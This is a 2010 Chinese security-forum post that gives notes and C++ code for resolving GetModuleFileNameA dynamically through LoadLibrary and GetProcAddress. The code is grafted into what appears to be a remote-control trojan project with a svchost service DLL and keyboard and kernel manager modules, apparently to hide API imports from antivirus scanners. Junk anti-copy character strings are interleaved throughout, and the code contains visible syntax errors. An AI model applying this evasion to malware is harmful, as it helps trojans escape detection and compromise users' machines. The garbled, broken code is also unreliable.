标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
7 [! c5 T& P- i
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
0 k4 p* Q* g" T9 J1 s8 [4 p2 m
----------------------------------------
1 Q! c( p |/ d6 i* D+ e/ T3 o* ^
DTDY.h:
8 g/ v& a$ |+ L+ b8 y
0 Y6 `. B: V+ A
#if _MSC_VER>1000
# ` K6 b' V4 Q8 v% \
#pragma once
; d, P7 m1 z7 z2 E0 l- @
#endif //_MSC_VER>1000
4 P* P8 h( |! O3 \& D% T7 |# v
#include<windows.h>
& U% W' K" a; _- ~9 o
; `" m/ S0 Q9 f
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
0 _; \* }/ i. g3 d4 Z; _
class DTDY
9 L0 I" _( p$ o5 ?
{
; n9 s, b6 _6 V& L3 U. v
public:
6 R8 ]6 q/ `% A# `$ ?; ^* N
DTDY();
0 O+ B% v: a- M5 `% b4 v" a
virtual ~DTDY();
* W2 D# E2 e3 j0 l
public:
- p4 Z: S" N; ~! ^7 e% e- p1 A
static pGetModuleFileNameA MyGetModuleFileName;
Y6 O7 ^; l9 [ T/ Y6 R# S
static BOOL FunInitiallization();
, m; T0 Y7 ^& T2 P; T
};
2 c n1 l3 ^* |+ s3 d4 A, o
#endif
# J* j4 e* |8 c$ {7 x
----------------------------------------
6 H% k# t) T5 `: D! G r! K
* o( r/ g: X; ]. ]( Z1 q
DTDY.cpp:
. `$ ?6 |9 H4 ^# s7 v4 Y0 c
/ k7 x$ @) n% v4 e* w9 J3 R
#include "DTDY.h"
; s( H2 ~% V/ O# o6 Z8 q/ b
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
6 N4 k$ J% d; Z0 l* R
DTDY:TDY()
( ?9 X) A m, O( Y& v$ u
{
, t, P Z) v6 }) g5 T, E2 s
}
: _# e [2 w; F! E
DTDY::~DTDY()
# {! z6 _# a) Y- Q% X8 a
{
3 \6 e, k. l" j& u1 z* }0 B
}
+ A+ Z; \$ E6 {3 w. b
BOOL DTDY::FunInitiallization()
. b0 ^+ \, ]+ r4 }
{
7 j* n* Y" \3 Z, G& L3 @% N
HMODULE hModule=LoadLibrary("kernel32.dll");
8 ?8 d9 P' M! a3 R" U" Z6 R' O6 M
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
/ V* k. R. d9 `0 {2 l4 Z
if(!MyGetModuleFileName=) return FALSE;
/ @, [+ v L G1 v8 r7 p
1 K$ T6 i# U: m! Z; i' \
return TRUE;
$ o/ [0 H% Y; O
}
$ Q; {9 k7 D* w& u# X( ?
----------------------------------------
* }. U1 ?+ U5 w/ H, t5 s; W) D6 w- Y
svchost.cpp:
: S* S$ H+ w" U
% K. W8 p- ]# `( y7 X
#include "DTDY.h"
$ l0 E! a" D |# Q5 n
2 Q2 }9 @$ @4 ~7 i2 U
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
3 Z2 n1 f5 X7 w/ L/ x
{
( \5 C+ T8 K2 Y) ^8 ~4 }9 B8 d
switch(ul_reason_for_call)
0 @, \0 T* }& ?5 n P. ]" d1 b3 _
{
7 i+ Z0 y0 c$ i; y, P3 u
case DLL_PROCESS_ATTACH:
6 s8 y- B( X) z( m" Q
if(!DTDY::FunInitiallization()) return FALSE;
" t6 n3 w' |' }6 [1 U
3 B6 y/ D; U0 Y! \4 ^' E
break;
1 M. I* R: N* E& Z9 F
}
# E$ C: u3 O# k7 u& `
}
4 t. q. y8 m1 @
$ \2 \, \/ X7 h" E3 c
8 [$ B- p& j w- J+ f+ n& P
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
. x) j$ x) k T1 z+ ^
改写为
# e( r3 O! R" G8 ~# P" e4 s6 H
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
% m5 C% x: K& b) _9 I
----------------------------------------
% B5 D6 B* H n. o) A3 }( W
KernelManager.cpp:
& ?& p. r0 h: }
7 E9 Y# [* R& y1 w" t6 K
#include "../DTDY.h"
. ~# A" j- t v+ h& h @ f7 `
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
# k% c( n5 g" G9 W; }0 P
改写为
" l3 R0 H2 [4 Y% g% n( ]
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
. _* T( Y2 p* d1 ?
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
